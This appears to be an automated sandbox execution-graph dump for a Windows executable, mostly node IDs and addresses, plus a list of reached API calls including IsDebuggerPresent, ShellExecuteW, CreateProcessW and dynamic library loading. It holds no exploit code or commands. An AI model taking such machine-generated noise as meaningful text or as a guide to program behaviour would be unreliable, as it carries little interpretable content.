7ff7adc4c907 93987->93989 93988 7ff7adc06505 93988->93989 93990 7ff7adc06512 93988->93990 94120 7ff7adc067d8 93989->94120 93991 7ff7adc0652c 63 API calls 93990->93991 93994 7ff7adc05846 93991->93994 93994->93855 93994->93856 93996 7ff7adc4c93f 93998 7ff7adc0e0bb 93997->93998 93999 7ff7adc0e0b6 93997->93999 93998->93862 94323 7ff7adc0f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93999->94323 94324 7ff7adc11a30 94001->94324 94003 7ff7adc0f029 94004 7ff7adc5a7a8 94003->94004 94005 7ff7adc0f040 94003->94005 94340 7ff7adc0ee20 5 API calls Concurrency::wait 94004->94340 94008 7ff7adc24c68 4 API calls 94005->94008 94007 7ff7adc5a7bc 94009 7ff7adc0f066 94008->94009 94011 7ff7adc0f08f 94009->94011 94339 7ff7adc0f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94009->94339 94335 7ff7adc0f1bc 94011->94335 94013 7ff7adc0f0c6 94013->93867 94015 7ff7adc05ac6 94014->94015 94016 7ff7adc05ae4 94014->94016 94017 7ff7adc0e0a8 4 API calls 94015->94017 94018 7ff7adc07cf4 4 API calls 94016->94018 94019 7ff7adc0592d 94017->94019 94018->94019 94020 7ff7adc28e28 94019->94020 94021 7ff7adc28e3f 94020->94021 94022 7ff7adc28ea4 94020->94022 94032 7ff7adc28e63 94021->94032 94342 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94021->94342 94344 7ff7adc28d98 35 API calls 2 library calls 94022->94344 94025 7ff7adc28ed6 94027 7ff7adc28ee2 94025->94027 94029 7ff7adc28ef9 94025->94029 94026 7ff7adc28e49 94343 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94026->94343 94345 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94027->94345 94035 7ff7adc32c80 37 API calls wcsftime 94029->94035 94036 7ff7adc28ef2 94029->94036 94031 7ff7adc28e54 94031->93884 94032->93884 94033 7ff7adc28ee7 94346 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94033->94346 94035->94029 94036->93884 94038 7ff7adc0dfac 94037->94038 94039 7ff7adc24c68 4 API calls 94038->94039 94040 7ff7adc059f5 94038->94040 94039->94040 94041 
7ff7adc0d670 94040->94041 94042 7ff7adc0d698 94041->94042 94046 7ff7adc0d6a2 94042->94046 94347 7ff7adc0880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94042->94347 94045 7ff7adc59d43 94047 7ff7adc0d7de 94046->94047 94348 7ff7adc0ee20 5 API calls Concurrency::wait 94046->94348 94047->93915 94049 7ff7adc829c8 94048->94049 94349 7ff7adc82b70 94049->94349 94052 7ff7adc067d8 45 API calls 94053 7ff7adc82a03 94052->94053 94054 7ff7adc067d8 45 API calls 94053->94054 94055 7ff7adc82a23 94054->94055 94056 7ff7adc067d8 45 API calls 94055->94056 94057 7ff7adc82a49 94056->94057 94058 7ff7adc067d8 45 API calls 94057->94058 94059 7ff7adc82a6d 94058->94059 94060 7ff7adc067d8 45 API calls 94059->94060 94061 7ff7adc82ac5 94060->94061 94062 7ff7adc8240c 32 API calls 94061->94062 94063 7ff7adc82ada 94062->94063 94065 7ff7adc829de 94063->94065 94354 7ff7adc81d48 94063->94354 94065->93858 94067 7ff7adc0653d 94066->94067 94069 7ff7adc06542 94066->94069 94068 7ff7adc34970 62 API calls 94067->94068 94068->94069 94070 7ff7adc0656f FreeLibrary 94069->94070 94071 7ff7adc06558 94069->94071 94070->94071 94071->93868 94073 7ff7adc0a7c0 4 API calls 94072->94073 94074 7ff7adc09d99 94073->94074 94074->93960 94076 7ff7adc06d74 LoadLibraryA 94075->94076 94077 7ff7adc06490 94075->94077 94076->94077 94078 7ff7adc06d89 GetProcAddress 94076->94078 94077->93974 94077->93977 94078->94077 94080 7ff7adc347fc 94079->94080 94081 7ff7adc3482a 94080->94081 94084 7ff7adc3485c 94080->94084 94140 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94081->94140 94083 7ff7adc3482f 94141 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94083->94141 94086 7ff7adc34862 94084->94086 94087 7ff7adc3486f 94084->94087 94142 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94086->94142 94128 7ff7adc3feb4 94087->94128 94091 7ff7adc064cf 94091->93980 94091->93981 94092 7ff7adc34890 94135 7ff7adc40304 94092->94135 94093 7ff7adc34883 94143 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 
94093->94143 94096 7ff7adc348a3 94144 7ff7adc2df60 LeaveCriticalSection 94096->94144 94282 7ff7adc06d1c 94098->94282 94101 7ff7adc064f7 94105 7ff7adc06580 94101->94105 94102 7ff7adc06d0f FreeLibrary 94102->94101 94103 7ff7adc06d1c 2 API calls 94104 7ff7adc06cf1 94103->94104 94104->94101 94104->94102 94106 7ff7adc24c68 4 API calls 94105->94106 94107 7ff7adc065b5 memcpy_s 94106->94107 94108 7ff7adc06740 CreateStreamOnHGlobal 94107->94108 94109 7ff7adc4c9f5 94107->94109 94112 7ff7adc06602 94107->94112 94111 7ff7adc06759 FindResourceExW 94108->94111 94108->94112 94286 7ff7adc82e00 45 API calls 94109->94286 94111->94112 94113 7ff7adc4c97e LoadResource 94112->94113 94114 7ff7adc067d8 45 API calls 94112->94114 94116 7ff7adc4c9fd 94112->94116 94119 7ff7adc066e8 94112->94119 94113->94112 94115 7ff7adc4c997 SizeofResource 94113->94115 94114->94112 94115->94112 94117 7ff7adc4c9ae LockResource 94115->94117 94118 7ff7adc067d8 45 API calls 94116->94118 94117->94112 94118->94119 94119->93988 94121 7ff7adc067f7 94120->94121 94124 7ff7adc4ca6c 94120->94124 94287 7ff7adc34c5c 94121->94287 94125 7ff7adc8240c 94306 7ff7adc82200 94125->94306 94127 7ff7adc82430 94127->93996 94145 7ff7adc3b9bc EnterCriticalSection 94128->94145 94130 7ff7adc3fecb 94131 7ff7adc3ff54 18 API calls 94130->94131 94132 7ff7adc3fed6 94131->94132 94133 7ff7adc3ba10 _isindst LeaveCriticalSection 94132->94133 94134 7ff7adc34879 94133->94134 94134->94092 94134->94093 94146 7ff7adc40040 94135->94146 94138 7ff7adc4035e 94138->94096 94140->94083 94141->94091 94142->94091 94143->94091 94151 7ff7adc4007d try_get_function 94146->94151 94148 7ff7adc402de 94165 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94148->94165 94150 7ff7adc4021a 94150->94138 94158 7ff7adc47738 94150->94158 94157 7ff7adc40211 94151->94157 94161 7ff7adc2db68 37 API calls 4 library calls 94151->94161 94153 7ff7adc40277 94153->94157 94162 7ff7adc2db68 37 API calls 4 library calls 94153->94162 94155 7ff7adc4029a 94155->94157 94163 7ff7adc2db68 37 
API calls 4 library calls 94155->94163 94157->94150 94164 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94157->94164 94166 7ff7adc46d04 94158->94166 94161->94153 94162->94155 94163->94157 94164->94148 94165->94150 94167 7ff7adc46d28 94166->94167 94168 7ff7adc46d40 94166->94168 94220 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94167->94220 94168->94167 94171 7ff7adc46d6d 94168->94171 94170 7ff7adc46d2d 94221 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94170->94221 94177 7ff7adc47348 94171->94177 94175 7ff7adc46d39 94175->94138 94223 7ff7adc47078 94177->94223 94180 7ff7adc473bc 94255 7ff7adc355b4 15 API calls _invalid_parameter_noinfo 94180->94255 94181 7ff7adc473d3 94243 7ff7adc3e418 94181->94243 94185 7ff7adc473c1 94256 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94185->94256 94186 7ff7adc473f7 CreateFileW 94189 7ff7adc47469 94186->94189 94190 7ff7adc474eb GetFileType 94186->94190 94187 7ff7adc473df 94257 7ff7adc355b4 15 API calls _invalid_parameter_noinfo 94187->94257 94195 7ff7adc474b8 GetLastError 94189->94195 94198 7ff7adc47478 CreateFileW 94189->94198 94192 7ff7adc47549 94190->94192 94193 7ff7adc474f8 GetLastError 94190->94193 94262 7ff7adc3e334 16 API calls 2 library calls 94192->94262 94260 7ff7adc35564 15 API calls 2 library calls 94193->94260 94194 7ff7adc473e4 94258 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94194->94258 94259 7ff7adc35564 15 API calls 2 library calls 94195->94259 94198->94190 94198->94195 94200 7ff7adc47507 CloseHandle 94200->94185 94201 7ff7adc47539 94200->94201 94261 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94201->94261 94204 7ff7adc47568 94206 7ff7adc475b5 94204->94206 94263 7ff7adc47284 67 API calls 2 library calls 94204->94263 94205 7ff7adc4753e 94205->94185 94210 7ff7adc475ec 94206->94210 94264 7ff7adc46de4 67 API calls 4 library calls 94206->94264 94209 7ff7adc475e8 94209->94210 94211 7ff7adc475fe 94209->94211 94265 7ff7adc404b8 94210->94265 94213 7ff7adc46d95 94211->94213 94214 
7ff7adc47681 CloseHandle CreateFileW 94211->94214 94213->94175 94222 7ff7adc3e3f4 LeaveCriticalSection 94213->94222 94215 7ff7adc476f9 94214->94215 94216 7ff7adc476cb GetLastError 94214->94216 94215->94213 94280 7ff7adc35564 15 API calls 2 library calls 94216->94280 94218 7ff7adc476d8 94281 7ff7adc3e548 16 API calls 2 library calls 94218->94281 94220->94170 94221->94175 94224 7ff7adc470a4 94223->94224 94231 7ff7adc470be 94223->94231 94225 7ff7adc355d4 memcpy_s 15 API calls 94224->94225 94224->94231 94226 7ff7adc470b3 94225->94226 94227 7ff7adc3b164 _invalid_parameter_noinfo 31 API calls 94226->94227 94227->94231 94228 7ff7adc4718c 94230 7ff7adc32554 31 API calls 94228->94230 94241 7ff7adc471ec 94228->94241 94229 7ff7adc4713b 94229->94228 94232 7ff7adc355d4 memcpy_s 15 API calls 94229->94232 94233 7ff7adc471e8 94230->94233 94231->94229 94234 7ff7adc355d4 memcpy_s 15 API calls 94231->94234 94235 7ff7adc47181 94232->94235 94236 7ff7adc4726b 94233->94236 94233->94241 94237 7ff7adc47130 94234->94237 94238 7ff7adc3b164 _invalid_parameter_noinfo 31 API calls 94235->94238 94239 7ff7adc3b184 _invalid_parameter_noinfo 16 API calls 94236->94239 94240 7ff7adc3b164 _invalid_parameter_noinfo 31 API calls 94237->94240 94238->94228 94242 7ff7adc47280 94239->94242 94240->94229 94241->94180 94241->94181 94244 7ff7adc3b9bc _isindst EnterCriticalSection 94243->94244 94251 7ff7adc3e43b 94244->94251 94245 7ff7adc3e487 94247 7ff7adc3ba10 _isindst LeaveCriticalSection 94245->94247 94246 7ff7adc3e464 94248 7ff7adc3e170 16 API calls 94246->94248 94249 7ff7adc3e52a 94247->94249 94250 7ff7adc3e469 94248->94250 94249->94186 94249->94187 94250->94245 94253 7ff7adc3e310 fwprintf EnterCriticalSection 94250->94253 94251->94245 94251->94246 94252 7ff7adc3e4c2 EnterCriticalSection 94251->94252 94252->94245 94254 7ff7adc3e4d1 LeaveCriticalSection 94252->94254 94253->94245 94254->94251 94255->94185 94256->94213 94257->94194 94258->94185 94259->94185 94260->94200 94261->94205 94262->94204 94263->94206 
94264->94209 94266 7ff7adc3e604 31 API calls 94265->94266 94269 7ff7adc404cc 94266->94269 94267 7ff7adc404d2 94268 7ff7adc3e548 16 API calls 94267->94268 94271 7ff7adc40534 94268->94271 94269->94267 94272 7ff7adc3e604 31 API calls 94269->94272 94279 7ff7adc4050c 94269->94279 94270 7ff7adc3e604 31 API calls 94274 7ff7adc40518 CloseHandle 94270->94274 94277 7ff7adc35564 fread_s 15 API calls 94271->94277 94278 7ff7adc40560 94271->94278 94273 7ff7adc404ff 94272->94273 94275 7ff7adc3e604 31 API calls 94273->94275 94274->94267 94276 7ff7adc40525 GetLastError 94274->94276 94275->94279 94276->94267 94277->94278 94278->94213 94279->94267 94279->94270 94280->94218 94281->94215 94283 7ff7adc06ce3 94282->94283 94284 7ff7adc06d2c LoadLibraryA 94282->94284 94283->94103 94283->94104 94284->94283 94285 7ff7adc06d41 GetProcAddress 94284->94285 94285->94283 94286->94116 94290 7ff7adc34c7c 94287->94290 94291 7ff7adc34ca6 94290->94291 94301 7ff7adc0680a 94290->94301 94292 7ff7adc34cd7 94291->94292 94293 7ff7adc34cb5 memcpy_s 94291->94293 94291->94301 94305 7ff7adc2df54 EnterCriticalSection 94292->94305 94303 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94293->94303 94297 7ff7adc34cca 94304 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94297->94304 94301->94125 94303->94297 94304->94301 94309 7ff7adc347bc 94306->94309 94308 7ff7adc82210 94308->94127 94312 7ff7adc34724 94309->94312 94313 7ff7adc34732 94312->94313 94314 7ff7adc34746 94312->94314 94320 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94313->94320 94315 7ff7adc34742 94314->94315 94322 7ff7adc3bef8 6 API calls __crtLCMapStringW 94314->94322 94315->94308 94318 7ff7adc34737 94321 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94318->94321 94320->94318 94321->94315 94322->94315 94323->93998 94325 7ff7adc11a48 94324->94325 94326 7ff7adc11c5f 94324->94326 94331 7ff7adc11a90 94325->94331 94341 7ff7adc25114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx 
EnterCriticalSection 94325->94341 94326->94003 94331->94003 94336 7ff7adc0f1ce 94335->94336 94338 7ff7adc0f1d8 94335->94338 94337 7ff7adc11a30 45 API calls 94336->94337 94337->94338 94338->94013 94339->94011 94340->94007 94342->94026 94343->94031 94344->94025 94345->94033 94346->94036 94347->94046 94348->94045 94353 7ff7adc82bae 94349->94353 94350 7ff7adc067d8 45 API calls 94350->94353 94351 7ff7adc829da 94351->94052 94351->94065 94352 7ff7adc8240c 32 API calls 94352->94353 94353->94350 94353->94351 94353->94352 94355 7ff7adc81d71 94354->94355 94356 7ff7adc81d61 94354->94356 94358 7ff7adc81dbf 94355->94358 94359 7ff7adc348e0 89 API calls 94355->94359 94360 7ff7adc81d7a 94355->94360 94357 7ff7adc348e0 89 API calls 94356->94357 94357->94355 94381 7ff7adc82038 94358->94381 94361 7ff7adc81d9e 94359->94361 94360->94065 94361->94358 94363 7ff7adc81da7 94361->94363 94363->94360 94393 7ff7adc34970 94363->94393 94364 7ff7adc81df5 94365 7ff7adc81e1c 94364->94365 94366 7ff7adc81df9 94364->94366 94371 7ff7adc81e4a 94365->94371 94372 7ff7adc81e2a 94365->94372 94368 7ff7adc81e07 94366->94368 94369 7ff7adc34970 62 API calls 94366->94369 94368->94360 94370 7ff7adc34970 62 API calls 94368->94370 94369->94368 94370->94360 94385 7ff7adc81e88 94371->94385 94373 7ff7adc81e38 94372->94373 94375 7ff7adc34970 62 API calls 94372->94375 94373->94360 94376 7ff7adc34970 62 API calls 94373->94376 94375->94373 94376->94360 94377 7ff7adc81e68 94377->94360 94380 7ff7adc34970 62 API calls 94377->94380 94378 7ff7adc81e52 94378->94377 94379 7ff7adc34970 62 API calls 94378->94379 94379->94377 94380->94360 94382 7ff7adc82069 94381->94382 94384 7ff7adc82056 memcpy_s 94381->94384 94383 7ff7adc34c5c _fread_nolock 45 API calls 94382->94383 94383->94384 94384->94364 94386 7ff7adc81fb0 94385->94386 94392 7ff7adc81eaa 94385->94392 94388 7ff7adc81fd3 94386->94388 94407 7ff7adc32a04 60 API calls 2 library calls 94386->94407 94388->94378 94390 7ff7adc81bd0 45 API calls 94390->94392 94392->94386 94392->94388 
94392->94390 94405 7ff7adc81c9c 45 API calls 94392->94405 94406 7ff7adc820cc 60 API calls 94392->94406 94394 7ff7adc3498e 94393->94394 94395 7ff7adc349a3 94393->94395 94409 7ff7adc355d4 15 API calls _invalid_parameter_noinfo 94394->94409 94397 7ff7adc3499e 94395->94397 94408 7ff7adc2df54 EnterCriticalSection 94395->94408 94397->94360 94398 7ff7adc34993 94410 7ff7adc3b164 31 API calls _invalid_parameter_noinfo 94398->94410 94400 7ff7adc349b9 94402 7ff7adc348ec 60 API calls 94400->94402 94403 7ff7adc349c2 94402->94403 94404 7ff7adc2df60 fflush LeaveCriticalSection 94403->94404 94404->94397 94405->94392 94406->94392 94407->94388 94409->94398 94410->94397 94412 7ff7adc48f90 wcsftime 94411->94412 94413 7ff7adc03ec4 GetLongPathNameW 94412->94413 94414 7ff7adc07cf4 4 API calls 94413->94414 94415 7ff7adc03eed 94414->94415 94416 7ff7adc04074 94415->94416 94417 7ff7adc09640 4 API calls 94416->94417 94418 7ff7adc0408e 94417->94418 94419 7ff7adc056d4 5 API calls 94418->94419 94420 7ff7adc0409b 94419->94420 94421 7ff7adc4bada 94420->94421 94422 7ff7adc040a7 94420->94422 94427 7ff7adc4bb0f 94421->94427 94463 7ff7adc21ad0 CompareStringW 94421->94463 94423 7ff7adc04680 4 API calls 94422->94423 94425 7ff7adc040b5 94423->94425 94459 7ff7adc040e8 94425->94459 94428 7ff7adc040cb Concurrency::wait 94428->93932 94430 7ff7adc06460 105 API calls 94429->94430 94431 7ff7adc063e5 94430->94431 94432 7ff7adc4c656 94431->94432 94433 7ff7adc06460 105 API calls 94431->94433 94434 7ff7adc82948 90 API calls 94432->94434 94435 7ff7adc06400 94433->94435 94436 7ff7adc4c66e 94434->94436 94435->94432 94437 7ff7adc06408 94435->94437 94438 7ff7adc4c690 94436->94438 94439 7ff7adc4c672 94436->94439 94441 7ff7adc4c67b 94437->94441 94442 7ff7adc06414 94437->94442 94440 7ff7adc24c68 4 API calls 94438->94440 94443 7ff7adc0652c 63 API calls 94439->94443 94458 7ff7adc4c6dd Concurrency::wait 94440->94458 94465 7ff7adc7c5c8 77 API calls wprintf 94441->94465 94464 7ff7adc0e774 143 API calls Concurrency::wait 
94442->94464 94443->94441 94446 7ff7adc06438 94446->93926 94447 7ff7adc4c68a 94447->94438 94448 7ff7adc4c895 94449 7ff7adc0652c 63 API calls 94448->94449 94457 7ff7adc4c8a9 94449->94457 94454 7ff7adc0ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94454->94458 94457->94448 94471 7ff7adc776d8 77 API calls 3 library calls 94457->94471 94458->94448 94458->94454 94458->94457 94466 7ff7adc77400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94458->94466 94467 7ff7adc7730c 39 API calls 94458->94467 94468 7ff7adc80210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94458->94468 94469 7ff7adc0b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94458->94469 94470 7ff7adc09940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94458->94470 94460 7ff7adc04107 94459->94460 94461 7ff7adc04130 memcpy_s 94459->94461 94462 7ff7adc24c68 4 API calls 94460->94462 94461->94428 94462->94461 94463->94421 94464->94446 94465->94447 94466->94458 94467->94458 94468->94458 94469->94458 94470->94458 94471->94457 94473 7ff7adc09762 94472->94473 94477 7ff7adc0988d 94472->94477 94474 7ff7adc24c68 4 API calls 94473->94474 94473->94477 94475 7ff7adc09791 94474->94475 94476 7ff7adc24c68 4 API calls 94475->94476 94480 7ff7adc0981c 94476->94480 94477->93937 94480->94477 94484 7ff7adc0abe0 81 API calls 2 library calls 94480->94484 94485 7ff7adc09940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94480->94485 94486 7ff7adc0b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94480->94486 94482->93939 94483->93941 94484->94480 94485->94480 94486->94480 94487->93952 94488 7ff7adc28fac 94489 7ff7adc2901c 94488->94489 94490 7ff7adc28fd2 GetModuleHandleW 94488->94490 94505 7ff7adc3b9bc EnterCriticalSection 94489->94505 94490->94489 94499 7ff7adc28fdf 94490->94499 94492 7ff7adc290cb 94493 
7ff7adc3ba10 _isindst LeaveCriticalSection 94492->94493 94494 7ff7adc290f0 94493->94494 94497 7ff7adc290fc 94494->94497 94502 7ff7adc29118 11 API calls 94494->94502 94495 7ff7adc290a0 94496 7ff7adc290b8 94495->94496 94500 7ff7adc3ada4 75 API calls 94495->94500 94501 7ff7adc3ada4 75 API calls 94496->94501 94498 7ff7adc29026 94498->94492 94498->94495 94503 7ff7adc3aa8c 30 API calls 94498->94503 94499->94489 94506 7ff7adc29164 GetModuleHandleExW 94499->94506 94500->94496 94501->94492 94502->94497 94503->94495 94507 7ff7adc2918e GetProcAddress 94506->94507 94508 7ff7adc291b5 94506->94508 94507->94508 94511 7ff7adc291a8 94507->94511 94509 7ff7adc291bf FreeLibrary 94508->94509 94510 7ff7adc291c5 94508->94510 94509->94510 94510->94489 94511->94508 94512 7ff7adc15f13 94514 7ff7adc15f1c memcpy_s 94512->94514 94515 7ff7adc614b6 94514->94515 94518 7ff7adc15f74 94514->94518 94521 7ff7adc15abd memcpy_s Concurrency::wait 94514->94521 94522 7ff7adc24c68 4 API calls 94514->94522 94523 7ff7adc0d4cc 94514->94523 94542 7ff7adc2364c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94515->94542 94517 7ff7adc614c5 94519 7ff7adc0e0a8 4 API calls 94517->94519 94520 7ff7adc0b960 4 API calls 94518->94520 94519->94521 94520->94521 94522->94514 94524 7ff7adc0d50b 94523->94524 94537 7ff7adc0d4f2 94523->94537 94525 7ff7adc0d53e 94524->94525 94526 7ff7adc0d513 94524->94526 94528 7ff7adc59bbc 94525->94528 94529 7ff7adc0d550 94525->94529 94535 7ff7adc59cc4 94525->94535 94543 7ff7adc2956c 31 API calls 94526->94543 94538 7ff7adc24c68 4 API calls 94528->94538 94539 7ff7adc59c3e Concurrency::wait wcscpy 94528->94539 94544 7ff7adc24834 46 API calls 94529->94544 94531 7ff7adc0d522 94536 7ff7adc0ec00 4 API calls 94531->94536 94533 7ff7adc59cdc 94546 7ff7adc29538 31 API calls 94535->94546 94536->94537 94537->94514 94540 7ff7adc59c0a 94538->94540 94545 7ff7adc24834 46 API calls 94539->94545 94541 7ff7adc0ec00 4 API calls 94540->94541 94541->94539 94542->94517 94543->94531 
94544->94531 94545->94535 94546->94533 94547 7ff7adc5f890 94556 7ff7adc0e18c 94547->94556 94549 7ff7adc5f8a9 94550 7ff7adc5f915 Concurrency::wait 94549->94550 94562 7ff7adc22ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94549->94562 94554 7ff7adc603e1 Concurrency::wait 94550->94554 94564 7ff7adc834e4 77 API calls 3 library calls 94550->94564 94552 7ff7adc5f8f6 94552->94550 94563 7ff7adc81464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94552->94563 94557 7ff7adc0e1a7 94556->94557 94558 7ff7adc0e1c2 94556->94558 94565 7ff7adc0ee20 5 API calls Concurrency::wait 94557->94565 94560 7ff7adc0e1af 94558->94560 94566 7ff7adc0ee20 5 API calls Concurrency::wait 94558->94566 94560->94549 94562->94552 94564->94554 94565->94560 94566->94560 94567 7ff7adc12c17 94570 7ff7adc114a0 94567->94570 94569 7ff7adc12c2a 94571 7ff7adc114d3 94570->94571 94574 7ff7adc5bdd1 94571->94574 94578 7ff7adc5bdf2 94571->94578 94583 7ff7adc5be31 94571->94583 94601 7ff7adc114fa memcpy_s 94571->94601 94575 7ff7adc5bddb 94574->94575 94574->94601 94635 7ff7adc99514 300 API calls 94575->94635 94577 7ff7adc11884 94627 7ff7adc22130 45 API calls 94577->94627 94586 7ff7adc5be19 94578->94586 94636 7ff7adc99a88 300 API calls 4 library calls 94578->94636 94638 7ff7adc98f48 300 API calls 3 library calls 94583->94638 94585 7ff7adc11898 94585->94569 94637 7ff7adc834e4 77 API calls 3 library calls 94586->94637 94587 7ff7adc24f0c __scrt_initialize_thread_safe_statics 34 API calls 94587->94601 94591 7ff7adc11a30 45 API calls 94591->94601 94594 7ff7adc22130 45 API calls 94594->94601 94595 7ff7adc5bfe4 94641 7ff7adc993a4 77 API calls 94595->94641 94599 7ff7adc0e0a8 4 API calls 94599->94601 94600 7ff7adc11799 94604 7ff7adc11815 94600->94604 94642 7ff7adc834e4 77 API calls 3 library calls 94600->94642 94601->94577 94601->94587 94601->94591 94601->94594 94601->94595 94601->94599 94601->94600 94601->94604 94605 7ff7adc13c20 94601->94605 94626 
7ff7adc0ef9c 46 API calls 94601->94626 94628 7ff7adc220d0 45 API calls 94601->94628 94629 7ff7adc05af8 300 API calls 94601->94629 94630 7ff7adc25114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94601->94630 94631 7ff7adc235c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94601->94631 94632 7ff7adc250b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94601->94632 94633 7ff7adc236c4 77 API calls 94601->94633 94634 7ff7adc237dc 300 API calls 94601->94634 94639 7ff7adc0ee20 5 API calls Concurrency::wait 94601->94639 94640 7ff7adc6ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94601->94640 94604->94569 94624 7ff7adc13c80 94605->94624 94606 7ff7adc605be 94645 7ff7adc834e4 77 API calls 3 library calls 94606->94645 94608 7ff7adc605d1 94608->94601 94610 7ff7adc14aa9 94611 7ff7adc14ac0 94610->94611 94614 7ff7adc0e0a8 4 API calls 94610->94614 94611->94601 94612 7ff7adc14fe7 94616 7ff7adc0e0a8 4 API calls 94612->94616 94613 7ff7adc13dde 94613->94601 94614->94613 94615 7ff7adc5fefe 94619 7ff7adc0e0a8 4 API calls 94615->94619 94616->94613 94617 7ff7adc0e0a8 4 API calls 94617->94624 94618 7ff7adc14a8f 94618->94610 94618->94611 94618->94615 94619->94611 94621 7ff7adc25114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94621->94624 94622 7ff7adc24f0c 34 API calls __scrt_initialize_thread_safe_statics 94622->94624 94623 7ff7adc09640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94623->94624 94624->94606 94624->94610 94624->94612 94624->94613 94624->94617 94624->94618 94624->94621 94624->94622 94624->94623 94625 7ff7adc250b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94624->94625 94643 7ff7adc15360 300 API calls Concurrency::wait 94624->94643 94644 7ff7adc834e4 77 API calls 3 library calls 94624->94644 
                                                                          Execution graph omitted: Joe Sandbox renders this as an interactive node-and-edge diagram, and the flattened node IDs and edge pairs carry no readable information. The labelled nodes that survive record the API calls reached along the graph: a window message loop (PeekMessageW, GetInputState, TranslateMessage, DispatchMessageW, IsDialogMessageW, TranslateAcceleratorW, DefWindowProcW, PostQuitMessage), file and directory handling (CreateFileW, SetFilePointerEx, WriteFile, GetFileAttributesW, FindFirstFileW, FindClose, CloseHandle, GetCurrentDirectoryW, GetSystemDirectoryW), process creation (CreateProcessW, GetLastError), tray icon and window management (Shell_NotifyIconW, CreatePopupMenu, SetTimer, KillTimer, RegisterWindowMessageW, MoveWindow, SetFocus, DestroyWindow, DestroyIcon, DeleteObject, LoadStringW, GetClassLongPtrW), synchronisation (EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx), and runtime or exception helpers (RtlPcToFileHeader, RaiseException, VariantClear, SetLastError, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapAlloc, CompareStringW, CharUpperBuffW, timeGetTime, memcpy_s, wcscpy, wcsftime, Concurrency::wait).

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC037F2
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC03807
                                                                          • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC0388D
                                                                            • Part of subcall function 00007FF7ADC03F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF7ADC038BF,?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC03FFD
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC03924
                                                                          • MessageBoxA.USER32 ref: 00007FF7ADC4B888
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC4B8E1
                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,00007FF7ADC03785), ref: 00007FF7ADC4B968
                                                                          • ShellExecuteW.SHELL32 ref: 00007FF7ADC4B98F
                                                                            • Part of subcall function 00007FF7ADC03B84: GetSysColorBrush.USER32 ref: 00007FF7ADC03B9E
                                                                            • Part of subcall function 00007FF7ADC03B84: LoadCursorW.USER32 ref: 00007FF7ADC03BAE
                                                                            • Part of subcall function 00007FF7ADC03B84: LoadIconW.USER32 ref: 00007FF7ADC03BC3
                                                                            • Part of subcall function 00007FF7ADC03B84: LoadIconW.USER32 ref: 00007FF7ADC03BDC
                                                                            • Part of subcall function 00007FF7ADC03B84: LoadIconW.USER32 ref: 00007FF7ADC03BF5
                                                                            • Part of subcall function 00007FF7ADC03B84: LoadImageW.USER32 ref: 00007FF7ADC03C21
                                                                            • Part of subcall function 00007FF7ADC03B84: RegisterClassExW.USER32 ref: 00007FF7ADC03C85
                                                                            • Part of subcall function 00007FF7ADC03CBC: CreateWindowExW.USER32 ref: 00007FF7ADC03D0C
                                                                            • Part of subcall function 00007FF7ADC03CBC: CreateWindowExW.USER32 ref: 00007FF7ADC03D5F
